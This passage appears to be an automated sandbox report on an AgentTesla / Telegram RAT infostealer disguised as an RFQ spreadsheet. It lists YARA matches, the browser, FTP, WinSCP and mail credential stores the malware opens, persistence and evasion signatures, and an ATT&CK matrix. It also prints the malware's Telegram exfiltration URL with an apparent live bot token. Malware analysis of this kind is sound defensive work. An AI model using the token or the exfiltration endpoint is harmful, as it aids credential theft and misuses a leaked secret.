                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS211
                      Security Software Discovery                      		Distributed Component Object Model21
                      Input Capture                      		3
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSH1
                      Clipboard Data                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445865 Sample: RFQ-101432620247fl#U00e2#U0... Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 46 api.telegram.org 2->46 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 58 13 other signatures 2->58 8 RFQ-101432620247fl#U00e2#U00aexslx.exe 7 2->8         started        12 ywKDUBCUA.exe 5 2->12         started        signatures3 56 Uses the Telegram API (likely for C&C communication) 46->56 process4 file5 42 C:\Users\user\AppData\Roaming\ywKDUBCUA.exe, PE32 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp9347.tmp, XML 8->44 dropped 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->60 62 Uses schtasks.exe or at.exe to add and modify task schedules 8->62 64 Adds a directory exclusion to Windows Defender 8->64 14 RFQ-101432620247fl#U00e2#U00aexslx.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        66 Antivirus detection for dropped file 12->66 68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 24 ywKDUBCUA.exe 12->24         started        26 schtasks.exe 12->26         started        28 ywKDUBCUA.exe 12->28         started        30 ywKDUBCUA.exe 12->30         started        signatures6 process7 dnsIp8 48 api.telegram.org 149.154.167.220, 443, 49709, 49712 TELEGRAMRU United Kingdom 14->48 72 Installs a global keyboard hook 14->72 74 Loading BitLocker PowerShell Module 18->74 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->76 78 Tries to steal Mail credentials (via file / registry access) 24->78 80 Tries to harvest and steal ftp login credentials 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 40 conhost.exe 26->40         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RFQ-101432620247fl#U00e2#U00aexslx.exe83%ReversingLabsByteCode-MSIL.Trojan.Negasteal
                      RFQ-101432620247fl#U00e2#U00aexslx.exe100%AviraTR/AVI.PWS.Agent.apilj
                      RFQ-101432620247fl#U00e2#U00aexslx.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ywKDUBCUA.exe100%AviraTR/AVI.PWS.Agent.apilj
                      C:\Users\user\AppData\Roaming\ywKDUBCUA.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ywKDUBCUA.exe83%ReversingLabsByteCode-MSIL.Trojan.Negasteal

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                      https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument0%Avira URL Cloudsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocumenttrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://account.dyn.com/RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.orgRFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
